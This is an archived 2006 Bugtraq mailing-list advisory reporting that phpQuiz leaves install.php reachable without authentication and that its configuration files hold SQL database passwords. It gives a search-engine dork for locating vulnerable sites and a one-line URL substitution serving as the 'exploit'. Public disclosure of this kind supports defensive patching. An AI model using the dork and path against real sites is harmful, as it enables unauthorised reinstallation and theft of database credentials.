[<prev] [next>] [day] [month] [year] [list]
Message-ID: <20060915114607.1281.qmail@securityfocus.com>
Date: 15 Sep 2006 11:46:07 -0000
From: sn_0py@...mail.com
To: bugtraq@...urityfocus.com
Subject: phpQuiz sensitive file (install.php)
* phpQuiz sensitive file (install.php without authentification) + Files containing interesting info (passwords for sql db)
* By : sn0oPy
* Risk : verry high
* Site : http://phpquiz.com/
* Dork : intitle:"phpQuiz" | " Développé par PhpQuiz v.1.0 " | "© PhpQuiz" | inurl:"PhpQuiz"
* exploit :
http://target.com/[phpquiz_path]/front/
replace by :
http://target.com/[phpquiz_path]/cfgphpquiz/install.php
* greetz : [subzero], Avg Team, Lhma9.
Powered by blists - more mailing lists